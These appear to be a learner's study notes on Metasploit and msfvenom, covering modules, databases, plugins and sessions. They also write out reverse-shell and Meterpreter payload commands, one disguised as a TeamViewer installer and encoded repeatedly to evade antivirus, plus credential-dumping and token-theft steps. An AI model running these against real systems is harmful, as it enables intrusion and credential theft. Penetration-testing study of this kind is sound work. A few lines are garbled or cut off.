Find the metasploit modules in: /usr/share/metasploit-framework/modules
Plugins: /usr/share/metasploit-framework/plugins/
Scripts: /usr/share/metasploit-framework/scripts/
To start msfconsole without banner, use -q
Can use for:
Enumeration
Preparation
Exploitation
Privilege Escalation
Post-Exploitation
Types of modules:
Auxiliary Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
Encoders Ensure that payloads are intact to their destination.
Exploits Defined as modules that exploit a vulnerability that will allow for the payload delivery.
NOPs (No Operation code) Keep the payload sizes consistent across exploit attempts.
Payloads Code runs remotely and calls back to the attacker machine to establish a connection (or shell).
Plugins Additional scripts can be integrated within an assessment with msfconsole and coexist.
Post Wide array of modules to gather information, pivot deeper, etc.
Auxiliary Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
Exploits Defined as modules that exploit a vulnerability that will allow for the payload delivery.
Post Wide array of modules to gather information, pivot deeper, etc.
For example, we can try to find the EternalRomance exploit for older Windows operating systems. This could look something like this:
Don't forget the command info
setg to set a permanent until program is restarted
setg rhosts <host>
we can combine payloads with: GentilKiwi's Mimikatz Plugin
We can use grep when searching for payloads. grep meterpreter grep reverse_tcp show payloads
help is available in metasploit
generic/custom Generic listener, multi-use
generic/shell_bind_tcp Generic listener, multi-use, normal shell, TCP connection binding
generic/shell_reverse_tcp Generic listener, multi-use, normal shell, reverse TCP connection
windows/x64/exec Executes an arbitrary command (Windows x64)
windows/x64/loadlibrary Loads an arbitrary x64 library path
windows/x64/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/x64/shell_reverse_tcp Normal shell, single payload, reverse TCP connection
windows/x64/shell/reverse_tcp Normal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcp Normal shell, stager + stage, IPv6 Bind TCP stager
windows/x64/meterpreter/$ Meterpreter payload + varieties above
windows/x64/powershell/$ Interactive PowerShell sessions + varieties above
windows/x64/vncinject/$ VNC Server (Reflective Injection) + varieties above
The different encoders: x64 x86 sparc ppc mips
We will always need to encode our payload according to our target architecture
msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai
or with msvenom
without encoding:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
w. encoding:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
read more about shikata_ga_nai encoding
we can select encoders with: show encoders & set encoders
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
If we were to encode an executable payload only once with SGN, it would most likely be detected by most antiviruses today. Let's delve into that for a moment. Picking up msfvenom, the subscript of the Framework that deals with payload generation and Encoding schemes, we have the following input:
One better option would be to try running it through multiple iterations of the same Encoding scheme:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
msf-virustotal that can use with an API key to analyze our payloads. However this requires free registration on virustotal.
msf-virustotal -k <API key> -f TeamViewerInstall.exe
Databases in msfconsole are used to keep track of the results. When dealing with more complex networks, it's to no surprise we need to store.
sudo service postgresql status
sudo systemctl start postgresql
Initiate the database:
sudo msfdb init
To update the database apt update or sudo msfdb init
sudo msfdb status - check status
sudo msfdb run
Reinitiate:
msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q
We can also use help database to get more information
We can think of Workspaces the same way we would think of folders in a project. We can segregate the different scan results, hosts, and extracted information by IP, subnet, network, or domain. To view the current Workspace list, use the workspace command. Adding a -a or -d switch after the command, followed by the workspace's name, will either add or delete that workspace to the database.
To show workspaces: workspace
workspace -a Target_1 -a (add)
workspace Target_1
workspace -h to receive help with the workspace command
Next, let us assume we want to import a Nmap scan of a host into our Database's Workspace to understand the target better. We can use the db_import command for this. After the import is complete, we can check the presence of the host's information in our database by using the hosts and services commands. Note that the .xml file type is preferred for db_import.
cat Target.nmap
db_import Target.xml
Alternatively, we can use Nmap straight from msfconsole! To scan directly from the console without having to background or exit the process, use the db_nmap command.
db_nmap -sV -sS 10.10.10.8
hosts
services
db_export -h
This data can be imported back to msfconsole later when needed. Other commands related to data retention are the extended use of hosts, services, and the creds and loot commands.
The hosts command displays a database table automatically populated with the host addresses, hostnames, and other information we find about these during our scans and interactions. For example, suppose msfconsole is linked with scanner plugins that can perform service and OS detection. In that case, this information should automatically appear in the table once the scans are completed through msfconsole. Again, tools like Nessus, NexPose, or Nmap will help us in these cases.
Hosts can also be manually added as separate entries in this table. After adding our custom hosts, we can also organize the format and structure of the table, add comments, change existing information, and more.
hosts -h
The services command functions the same way as the previous one. It contains a table with descriptions and information on services discovered during scans or interactions. In the same way as the command above, the entries here are highly customizable.
services -h
The creds command allows you to visualize the credentials gathered during your interactions with the target host. We can also add credentials manually, match existing credentials with port specifications, add descriptions, etc.
creds -h
The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.
Since msfconsole is community driven, there are indeed many plugins from the community
Plugins at: /usr/share/metasploit-framework/plugins
load module load nessus
git clone https://github.com/darkoperator/Metasploit-Plugins
ls Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
Popular msfconsoleplugins
nMap (pre-installed) NexPose (pre-installed) Nessus (pre-installed)
Mimikatz (pre-installed V.1) Stdapi (pre-installed) Railgun
Priv Incognito (pre-installed) Darkoperator's
[CTRL] + [Z] or background to put session in bg.
List sessions by sessions
Jobs help: jobs -h
When we run an exploit, we can run it as a job by typing exploit -j. Per the help menu for the exploit command, adding -j to our command. Instead of just exploit or run, will "run it in the context of a job."
Listing jobs: jobs -l
To exploit a vulnerable sudo version, create a session in metasploit and attach the session to the new exploit.
MSF scanning target
msf6: db_nmap -sV -p- -T5 -A 10.10.10.15
We can thereafter query for services or hosts
We can steel tokens with steal_token <nr>
we can get suggestions for exploits: post/multi/recon/local_exploit_suggester
We can get user id from session: meterpreter > getuid
meterpreter > hashdump
lsa_dump_sam
meterpreter > lsa_dump_secrets
From this point, if the machine was connected to a more extensive network, we could use this loot to pivot through the system, gain access to internal resources and impersonate users with a higher level of access if the overall security posture of the network is weak.
If we cannot find the exploit we're looking for,
search in cli: searchsploit nagios3 (name)
Filter: searchsploit -t Nagios3 --exclude=".py"
Adding modules live: cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb
msfconsole -m /usr/share/metasploit-framework/modules/
loadpath /usr/share/metasploit-framework/modules/
msf6 > reload_all
msf6 > use exploit/unix/webapp/nagios3_command_injection
msf6 exploit(unix/webapp/nagios3_command_injection) > show optioGenerate payload using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx